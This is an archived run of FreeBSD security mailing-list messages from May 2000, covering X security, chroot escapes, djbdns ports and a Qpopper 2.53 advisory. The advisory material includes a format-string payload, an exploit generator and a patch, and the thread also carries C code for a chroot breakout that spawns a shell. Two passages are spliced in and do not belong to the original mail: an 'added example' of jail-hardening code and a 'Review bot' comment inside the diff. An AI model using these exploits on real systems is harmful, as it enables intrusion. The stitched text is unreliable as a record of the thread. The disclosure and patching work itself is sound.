Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 21:11:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with ESMTP id 783D737B898 for ; Mon, 22 May 2000 21:11:33 -0700 (PDT) (envelope-from robinson@netrinsics.com) Received: from netrinsics.com ([202.108.133.96]) by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id LAA12630 for ; Tue, 23 May 2000 12:04:07 +0800 (GMT) Received: (from robinson@localhost) by netrinsics.com (8.9.3/8.9.3) id LAA35900; Tue, 23 May 2000 11:58:57 +0800 (+0800) (envelope-from robinson) Date: Tue, 23 May 2000 11:58:57 +0800 (+0800) 
From: Michael Robinson Message-Id: <200005230358.LAA35900@netrinsics.com> To: bdeless@efn.org, freebsd-security@freebsd.org Subject: Re: Web Server and Xwindows In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I currently run a web site on a 4.0 box using the >current version of Apache. I must confess a desire to install X(w/KDE) >now. This box is in the DMZ, has PHP3 and MySQL. Sendmail is also handled here. Use IPSEC. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 22 21:33:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1CFE937B9D9 for ; Mon, 22 May 2000 21:33:27 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA18625; Mon, 22 May 2000 22:32:54 -0600 (MDT) Message-Id: <4.3.1.2.20000522222344.00dd2870@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 22 May 2000 22:32:49 -0600 To: Warner Losh , Fernando Schapachnik 
From: Brett Glass Subject: Re: The procfs Hole in 2.2.8-STABLE? Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG In-Reply-To: <200005230344.VAA99816@harmony.village.org> References: <200005230126.WAA02250@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:44 PM 5/22/2000, Warner Losh wrote: >Generally speaking, if the advisory doesn't mention the version of >freebsd you are interested in, then the bug is likely still in that >version. Also, there have been several DoS bugs that people have >written exploits for after bugs were corrected in FreeBSD. Not all of >these have had advisories since some of them have come along months or >years after the bug fix. As far as I know, the only remote exploits for 2.2.8 itself are DoS attacks, not root exploits. However, there ARE root exploits for some of the ported third-party daemons that were included with that release. Make sure that key daemons such as Apache, BIND, SSH, QPopper, etc. are updated and that unnecessary services are shut down. You should then be OK. The biggest stability problems in 2.2.8 have to do with problems in some of the old PCI and ATAPI code. (On some machines, it was necessary to compile with the ATAPI_STATIC option and remove the PCI driver to make the system stable, as I learned the hard way.) I administer very few systems that still run 2.2.8, but there are some. They're small-memory systems that would have trouble with the larger kernels generated by later versions. 
--Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 4:43:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 0D0BB37B54E for ; Tue, 23 May 2000 04:43:46 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id EAA04592; Tue, 23 May 2000 04:39:38 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id EAA63416; Tue, 23 May 2000 04:39:38 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id EAA13204; Tue, 23 May 2000 04:39:36 -0700 (PDT) 
From: Don Lewis Message-Id: <200005231139.EAA13204@salsa.gv.tsc.tdk.com> Date: Tue, 23 May 2000 04:39:35 -0700 In-Reply-To: <2780.958684841@critter.freebsd.dk> References: <2780.958684841@critter.freebsd.dk> X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98) To: Poul-Henning Kamp , Harold Gutch Subject: Re: envy.vuurwerk.nl daily run output Cc: Cy Schubert - ITSD Open Systems Group , Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On May 18, 11:20pm, Poul-Henning Kamp wrote:
} Subject: Re: envy.vuurwerk.nl daily run output
}
} Please check the action of the "kern.chroot_allow_open_directories"
} for a deeper explanation of this one. It is not set to zero for
} fear of compatibility issues. Maybe we should set it to zero in
} -current to see if there are any such issues.

That only protects against carelessly written chroot wrappers that leave file descriptors open that point to directories outside the jail. Given that, even a non-root process can escape.

Even with kern.chroot_allow_open_directories disabled, I know of two ways that a process can escape if it can fork() and can execute chroot() again (the latter requires the process to be root), unless further modifications have been made to the chroot syscall. These changes have been in FreeBSD 4.x and later since last September.

} In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes:
} >What about the "other" chroot-breakout, does it still work under
} >FreeBSD 4.0?

Try statically linking the executable and doing:

	mkdir jail jail/tmp
	cp a.out jail
	chroot jail a.out

This code should be able to escape the jail in 3.x. In 4.x it will be able to escape jail/tmp (if kern.chroot_allow_open_directories is enabled) but it won't be able to escape jail.

} >Here's the breakout-code modulo checks whether /tmp exists etc.
} >
} >#include <fcntl.h>
} >#include <stdlib.h>
} >#include <unistd.h>
} >
} >int main(int argc, char *argv[])
} >{
} >	int handle, i;
} >
} >	handle = open("/", O_RDONLY);	/* directory fd that lies outside the jail-to-be */
} >	chroot("/tmp");
} >	chdir("/");
} >	fchdir(handle);			/* cwd is now outside the new root */
} >	for (i = 0; i < 32; i++)
} >		chdir("..");		/* walk up to the real root */
} >	chroot(".");			/* re-root there */
} >	chdir("/");
} >	system("/bin/sh");
} >
} >	return 0;
} >}

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 9: 4:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from berlin.axl.net (berlin.axl.net [216.66.11.23]) by hub.freebsd.org (Postfix) with SMTP id 12B5237B8FB for ; Tue, 23 May 2000 09:04:35 -0700 (PDT) (envelope-from matt@axl.net) Received: (qmail 62597 invoked by uid 85); 23 May 2000 16:05:29 -0000 Received: from matt@axl.net by berlin.axl.net with scan4virus-0.19 (sweep: 1.8/3.33. . Clean. Processed in 0.679938 secs); 23/05/2000 16:05:28 Received: from ws-01.matthennigus.lightningdsl.net (HELO sinister) (216.66.30.66) by berlin.axl.net with SMTP; 23 May 2000 16:05:27 -0000 
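The two things Don's message says a chroot wrapper has to get right, as an added example that is not code from the thread or from FreeBSD: never carry a directory descriptor that points outside the jail across the chroot() (that is exactly what the fchdir() in the breakout above uses, and what kern.chroot_allow_open_directories guards against), and give up root for good once inside, because a process that can still call chroot() walks out with chroot(".") and a run of chdir(".."). enter_jail() needs root to do anything useful; the helper names, the uid/gid arguments and the command-line shape of main() are choices made here for illustration.

```c
#define _DEFAULT_SOURCE
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* is_dir_fd: 1 if fd is an open directory, 0 if it is closed or not a directory. */
int is_dir_fd(int fd)
{
    struct stat st;
    if (fstat(fd, &st) != 0)
        return 0;
    return S_ISDIR(st.st_mode) ? 1 : 0;
}

/* close_dir_fds: close every open directory descriptor except 'keep'
 * (pass -1 to keep none).  Returns the number of descriptors closed.
 * This is the audit a careless wrapper skips: any directory fd that
 * survives the chroot() is a handle on the outside filesystem. */
int close_dir_fds(int keep)
{
    long max = sysconf(_SC_OPEN_MAX);
    int fd, closed = 0;

    if (max < 0 || max > 65536)
        max = 65536;                /* bounded scan if the limit is unknown or huge */
    for (fd = 0; fd < max; fd++) {
        if (fd == keep)
            continue;
        if (is_dir_fd(fd)) {
            close(fd);
            closed++;
        }
    }
    return closed;
}

/* enter_jail: must be called as root.  Returns 0 on success, -1 with errno set.
 * Order: drop outside directory fds, chdir into the jail, chroot("."), chdir("/"),
 * then drop supplementary groups, gid and uid.  With the real, effective and saved
 * uid all non-zero, chroot() fails with EPERM for this process and every child,
 * which closes the fork()+chroot() route Don describes. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0) {                 /* a root process inside a chroot is not confined */
        errno = EINVAL;
        return -1;
    }
    close_dir_fds(-1);
    if (chdir(dir) != 0)
        return -1;
    if (chroot(".") != 0)
        return -1;
    if (chdir("/") != 0)            /* cwd must be inside the new root, not inherited */
        return -1;
    if (setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    if (setuid(0) == 0) {           /* must fail; if it succeeds, root was not dropped */
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char *argv[])
{
    /* usage (as root): ./jail <dir> <uid> <gid> <program-inside-jail> */
    if (argc != 5)
        return 2;
    if (enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) != 0) {
        perror("enter_jail");
        return 1;
    }
    execl(argv[4], argv[4], (char *)NULL);
    perror("execl");
    return 1;
}
```

On 4.x with kern.chroot_allow_open_directories set to 0 the kernel refuses the first escape by itself; close_dir_fds() is the userland equivalent for systems without that sysctl. The setuid() step is what defeats the second escape, and the setuid(0) probe afterwards catches the classic mistake of calling seteuid() and leaving the saved uid at zero.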
From: "Matthew B. Henniges" To: Cc: Subject: RE: pid file for named Date: Tue, 23 May 2000 12:07:33 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20000522133305.A40314@mithrandr.moria.org> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Sun 2000-05-21 (22:21), Chris Johnson wrote: > > That hasn't been my experience, and I'm running djb's (that's Daniel J. > > Bernstein, if anyone's wondering) dnscache/tinydns everywhere. > If you have > > performance problems, try posting a message to > dns@list.cr.yp.to and see if > > anyone has anything to offer. It's much faster for me as well, but even if it wasn't, I would still use it. My primary reason for switching was security. > > > > I've been BIND-free since dnscache's first alpha release, and I > haven't had a > > single problem. Yeah, it's been fine for me ever since .69 or so... > Have you tried the port? I haven't been able to find anyone else to > test it properly. I'd appreciate some feedback. I have never used the port, however, dnscache goes on all my machines... A working port would be great to have. I'll test it a bit for you. > > Neil (who is unfortunately maintainer for most of the djb ports) I'm a big fan of DJB software. qmail, daemontools, ezmlm-idx, and dnscache are all very important to me. I'll be happy to help you with any of those. Matthew B. 
Henniges CoPresident Axl.net Communications http://www.axl.net (203) 552-1714 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 15:28:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from clavin.efn.org (clavin.efn.org [206.163.176.10]) by hub.freebsd.org (Postfix) with ESMTP id 19E8737B6F7 for ; Tue, 23 May 2000 15:28:23 -0700 (PDT) (envelope-from bdeless@efn.org) Received: from garcia.efn.org (bdeless@garcia.efn.org [206.163.176.5]) by clavin.efn.org (8.10.1/8.10.1) with ESMTP id e4NMSMx15408; Tue, 23 May 2000 15:28:22 -0700 (PDT) Received: from localhost (bdeless@localhost) by garcia.efn.org (8.10.1/8.10.1) with ESMTP id e4NMSKj24555; Tue, 23 May 2000 15:28:20 -0700 (PDT) X-Authentication-Warning: garcia.efn.org: bdeless owned process doing -bs Date: Tue, 23 May 2000 15:28:18 -0700 (PDT) 
From: BD To: Michael Robinson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Web Server and Xwindows In-Reply-To: <200005230358.LAA35900@netrinsics.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've never used or installed IPSEC although I'm aware that is part of 4.0(?). Since I will only use X locally is this still necessary? I had planned to use ipfw to block X at the interface. I am completely ignorant when it comes to securing X (that's why I've never used it before). I apologize if this should have gone to questions but I felt this list was probably where I would get the best answer. (list newbie) Thanks Again, Robert On Tue, 23 May 2000, Michael Robinson wrote: > >I currently run a web site on a 4.0 box using the > >current version of Apache. I must confess a desire to install X(w/KDE) > >now. This box is in the DMZ, has PHP3 and MySQL. Sendmail is also handled here. > > Use IPSEC. > > -Michael Robinson > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 18:48: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from sin.core-sdi.com (sin.core-sdi.com [200.49.71.179]) by hub.freebsd.org (Postfix) with ESMTP id 8334837BB34; Tue, 23 May 2000 18:47:57 -0700 (PDT) (envelope-from alejo@core-sdi.com) Received: from amadeus.servers.core-sdi.com (amadeus.servers.core-sdi.com [192.168.13.3]) by sin.core-sdi.com (Postfix) with ESMTP id 05F7F1E01; Tue, 23 May 2000 23:00:18 -0300 (ART) Received: from core-sdi.com (mona.corelabs.core-sdi.com [192.168.66.201]) by amadeus.servers.core-sdi.com id AAA23514; Wed, 24 May 2000 00:33:14 -0300 Message-ID: <392B3543.B8AA689A@core-sdi.com> Date: Tue, 23 May 2000 22:49:55 -0300 
From: Alejo Sanchez X-Mailer: Mozilla 4.61 [en] (X11; U; OpenBSD 2.7 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-hackers@freebsd.org, freebsd-security@freebsd.org, tech-security@netbsd.org, tech-misc@netbsd.org, debian-security@lists.debian.org, debian-testing@lists.debian.org Subject: TESTERS NEEDED: msyslog pre-release Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi,

A pre-release of the new modular syslog system is available for download. It has been tested under OpenBSD 2.6 and 2.7, and RedHat 6.1, but we'd like to hear from you. It's the predecessor of the secure syslog. Here's a brief list of features:

* Input and output were heavily modularized, and writing new modules is very easy
* New authentication + integrity PEO module (as in previous ssyslog)
* New output to mysql module

And of course, its license is BSD :)

Still, there is a lot of room for improvement. That's why we ask you to take some time and test it, and send your suggestions, comments, patches or anything else you think important. For this matter, we have set up 2 mailing lists: msyslog-dev, for technical discussions, and msyslog-usr, for general usage. To subscribe to them you have to send a mail to majordomo@core-sdi.com, containing in its body:

subscribe msyslog-usr
and/or
subscribe msyslog-dev

Cheers, Alejo -- Alejo Sanchez - Developer alejo@core-sdi.com Core SDI S.A. 
http://www.core-sdi.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 23 19:53:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id D330F37BB3D for ; Tue, 23 May 2000 19:53:23 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id WAA40604; Tue, 23 May 2000 22:53:12 -0400 (EDT) (envelope-from cjc) Date: Tue, 23 May 2000 22:53:12 -0400 
From: "Crist J. Clark" To: BD Cc: Michael Robinson , freebsd-security@FreeBSD.ORG Subject: Re: Web Server and Xwindows Message-ID: <20000523225312.C40441@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <200005230358.LAA35900@netrinsics.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from bdeless@efn.org on Tue, May 23, 2000 at 03:28:18PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 23, 2000 at 03:28:18PM -0700, BD wrote: > I've never used or installed IPSEC although I'm aware that is part of > 4.0(?). Since I will only use X localy is this still necessary? I had > planned to use ipfw to block X at the interface. I am completly ignorant > when it comes to securing X (that's why I've never used it before). > > I apologize if this should have gone to questions but I felt this list was > probably where I would get the best answer. (list newbie) If you are only concerned about remote attacks from users with no authorized access to the box, then I think blocking the usual X ports is adequate. And do also make sure XDMCP is not enabled anyway. However, if you are concerned about users with accounts on the box, it's a different matter. X has plenty of setuid, and I would guess something like KDE adds a bunch more. X also is well known for letting average users mess with one another's "stuff" if not configured very tightly. But remember, if the X users are sitting at the box and have physical access to it... game's already over. No security without physical security, so why sweat over some possible, but as yet unknown, local X exploits? My $0.02. -- Crist J. 
Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 2: 0:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id DD98137BC23 for ; Wed, 24 May 2000 02:00:05 -0700 (PDT) (envelope-from nbm@sunesi.net) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 12uX1A-000Gsr-00; Wed, 24 May 2000 10:59:56 +0200 Date: Wed, 24 May 2000 10:59:56 +0200 
From: Neil Blakey-Milner To: "Matthew B. Henniges" Cc: freebsd-security@freebsd.org Subject: Re: pid file for named Message-ID: <20000524105956.A64851@mithrandr.moria.org> References: <20000522133305.A40314@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from matt@axl.net on Tue, May 23, 2000 at 12:07:33PM -0400 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue 2000-05-23 (12:07), Matthew B. Henniges wrote: > > Have you tried the port? I haven't been able to find anyone else to > > test it properly. I'd appreciate some feedback. > > I have never used the port, however, dnscache goes on all my machines...A > working port would great to have. I'll test it a bit for you. It's all sitting there in /usr/ports/net/dnscache, have fun. (: > > Neil (who is unfortunately maintainer for most of the djb ports) > > I'm a big fan of DJB software. > > qmail, daemontools, ezmlm-idx, and dnscache are all very important to me. > I'll be happy to help you with any of those. Yeah, I directly admin, and help admin and support a large number of "djb" machines. The software works. Maintaining the occasional non-backwards-compatible change is a bit more of a problem - hence daemontools53, and daemontools ports. Any help appreciated, but I'm not looking to rid myself of the work. 
Neil -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 2:17: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with ESMTP id C57E837BA8D for ; Wed, 24 May 2000 02:16:47 -0700 (PDT) (envelope-from robinson@netrinsics.com) Received: from netrinsics.com ([202.108.133.96]) by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id RAA06354 for ; Wed, 24 May 2000 17:13:04 +0800 (GMT) Received: (from robinson@localhost) by netrinsics.com (8.9.3/8.9.3) id OAA37954; Wed, 24 May 2000 14:11:37 +0800 (+0800) (envelope-from robinson) Date: Wed, 24 May 2000 14:11:37 +0800 (+0800) 
From: Michael Robinson Message-Id: <200005240611.OAA37954@netrinsics.com> To: bdeless@efn.org, robinson@netrinsics.com Subject: Re: Web Server and Xwindows Cc: freebsd-security@freebsd.org In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org BD writes: >I've never used or installed IPSEC although I'm aware that is part of >4.0(?). Since I will only use X localy is this still necessary? I had >planned to use ipfw to block X at the interface. In that case, you should probably block everything at the interface, and only allow the absolute minimum necessary for your primary services. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 14:40:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (Postfix) with ESMTP id EE3A537B6CD for ; Wed, 24 May 2000 14:40:01 -0700 (PDT) (envelope-from jer@jorsm.com) Received: by mercury.jorsm.com (Postfix, from userid 1850) id 21F85E4A22; Wed, 24 May 2000 16:40:00 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by mercury.jorsm.com (Postfix) with ESMTP id 0F300E0C01 for ; Wed, 24 May 2000 16:40:00 -0500 (CDT) Date: Wed, 24 May 2000 16:40:00 -0500 (CDT) 
From: Jeremy Shaffner To: freebsd-security@freebsd.org Subject: QPOPPER: Remote gid mail exploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

[Patch is at the end]

Here is the original advisory. Note that the actual advisory is correct WRT the file and line numbers. The posts on Bugtraq indicate to patch pop_msg.c instead of pop_uidl.c.

------>8----------

	_____________________________________________________________________
	b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 5

		Advisory Name:	Remote shell via Qpopper2.53
		Date:		5/23/00
		Application:	Qpopper 2.53 for *NIX
		Vendor:		Qualcomm Incorporated
		WWW:		www.qualcomm.com
		Severity:	can give users remote shell with gid=mail.
		Author:		prizm (prizm@resentment.org)
		Homepage:	b0f.freebsd.lublin.pl

* Overview
	Qpopper is the most widely-used server for the POP3 protocol. This allows users to access their mail using any POP3 client. Qpopper supports the latest standards, and includes a large number of optional features. Qpopper is normally used with standard UNIX mail transfer and delivery agents such as sendmail or smail.

* The Problem
	Yes, Qpop, again and again...
	There is a bug in version 2.53 of Qpop that can give you a remote shell with gid=mail. Problem is with euidl command which uses user input as format string for pop_msg() function.
	Let's examine following code from Qpop 2.53 source:
	--> pop_uidl.c, around line 150:
	    ................
	    sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
	    if (nl = index(buffer, NEWLINE)) *nl = 0;
	    sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
	  ! return (pop_msg (p,POP_SUCCESS, buffer));
	                                    ^^^^^^^^^^^^^
	    .................
	Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, const char *format,...), and here we have user-input as format string. Lame.
	Ok, back to problem, imagine following smtp session:

	    MAIL FROM:
	    200 Ok
	    RCPT TO:
	    200 Ok
	    data
	    200 Okey, okey. end with "."
	    Subject: still trust qpop?=/
	    X-UIDL: AAAAAAAAAAAAAAAA
	    From: %p%p%p%p%p%p%p
	    test
	    .
	    200 BLABLABLA Ok, message accepted for delivery.

	Then, luser connects with his pop account and runs euidl command there:

		+OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
		USER luser
		+OK Password required for luser.
		PASS secret
		+OK luser has 3 messages (1644 octets).
		euidl 3
		+OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028

	Yeah, that's from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p were implemented as arguments for vsnprintf() command.

* Exploiting
	Is this possible? Yeah, sure!
	But there are some limits. Qpopper2.53 from FreeBSD ports with patches is much more difficult to exploit than one from linux. It is because freebsd patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is big difference between them. Qpopper with FreeBSD's patches IS exploitable.

Exploit
-------
/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
 *
 * Sample exploit for buffer overflow in Qpopper 2.53.
 * This little proggie generates a mail u need to send.
 *
 * Standard disclaimer applies.
 * By the way, exploit is broken =) You need to insert shellcode.
 *
 * MAD greets to tf8 for pointing out the bug, and all other b0f members.
 * greets to USSRLabs and ADM
 * check http://b0f.freebsd.lublin.pl/ for news.
 */
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="imnothing";	/* placeholder; the author deliberately left real shellcode out */

int main(int argc, char *argv[])
{
	int i;
	unsigned long ra=0;

	if(argc!=2) {
		fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
		exit(0);
	}
	sscanf(argv[1], "%lx", &ra);
	if(!ra)
		return 1;
	if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
		fprintf(stderr,"Bad shellcode\n");
		exit(0);
	}
	fprintf(stderr,"return address: 0x%.8lx\n", ra);

	/* X-UIDL: carries the shellcode; it is echoed back by euidl */
	printf("X-UIDL: ");
	for(i=0; i < sizeof(shellcode);i++)
		printf("%c", shellcode[i]);
	printf("\r\n");

	/* From: carries the format string plus 50 copies of the return address */
	printf("From: %s", "%.1000d");
	for(i=0; i < 50; i++)
		printf("%c%c%c%c", (int)(ra & 0xff), (int)((ra & 0xff00)>>8),
		       (int)((ra & 0xff0000)>>16), (int)((ra & 0xff000000)>>24));
	printf("@test\r\n");
	printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
	return 0;
}

	Exploiting QPOP from FreeBSD ports
	----------------------------------
	It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't overflow stack, but we still have control over it (remember %n?).
	Im not going to post exploit for this because it is really generic, but I will explain theory on exploiting qpop with vsNprintf.
	There is a little trick with %n YOu should know. Try to understand why following code succeeds and prints out 2000, not sizeof(b):

------
#include <stdio.h>

int main(void){
	int s=1;
	char b[1024];
	int q;

	snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
	return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
------

	On my box with FreeBSD 3.4 i have:
	2000, overflowed? NO
	Hah, first time i expected to see 1024, but YOu know that all is unpredictable . So, this little thing will help us a lot.

	Exploiting it:
	a) Find where in stack is located user input.
	b) Compose a message with filed X-UIDL and
From:

		X-UIDL: ppRETARETARETARETA
		From: %.RETURNd%n@test

	where:
	"pp"			is for padding (two or three chars)
	"RETA"			is return address pointing to SHELLCODE
	"SHELLCODE"		guess
	"RETURN"		return address

	c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself.

* Vulnerable Versions
	2.53(Others?)

* Fix
	You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which is not vulnerable to this problem.
	Or you can manually patch it by doing the following:
	At lines 152 and 62 from pop_uidl.c, replace:
	- return (pop_msg (p,POP_SUCCESS, buffer));
	to:
	+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));

					copyright © 1999-2000
				prizm, buffer0verfl0w security
					b0f.freebsd.lublin.pl
---------->8------------

Here is the resulting patch:

---------8<--------
--- pop_uidl.c.orig	Wed May 24 15:58:53 2000
+++ pop_uidl.c	Wed May 24 16:21:56 2000
@@ -59,7 +59,7 @@
 
             sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
             if (nl = index(buffer, NEWLINE)) *nl = 0;
-            return (pop_msg (p,POP_SUCCESS, buffer));
+            return (pop_msg (p,POP_SUCCESS, "%s", buffer));
         }
     } else {
         /* yes, we can do this */
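Review bot: the `+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));` line closes the format-string hole in this UIDL path, but the context line `sprintf(buffer, "%d %s", msg_id, mp->uidl_str);` two lines above it still copies `mp->uidl_str` into `buffer` with no bound, so a long X-UIDL header keeps a plain overflow here even after the patch. Suggest `snprintf(buffer, sizeof(buffer), "%d %s", msg_id, mp->uidl_str)` (or a length cap where `uidl_str` is parsed from the header), and a sentence in the patch description saying that only the callers are being fixed while `pop_msg()` itself still accepts whatever format it is handed, so the other callers need the same audit.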
@@ -149,7 +149,7 @@
             sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
             if (nl = index(buffer, NEWLINE)) *nl = 0;
             sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
-            return (pop_msg (p,POP_SUCCESS, buffer));
+            return (pop_msg (p,POP_SUCCESS, "%s", buffer));
         }
     } else {
         /* yes, we can do this */
------->8----------

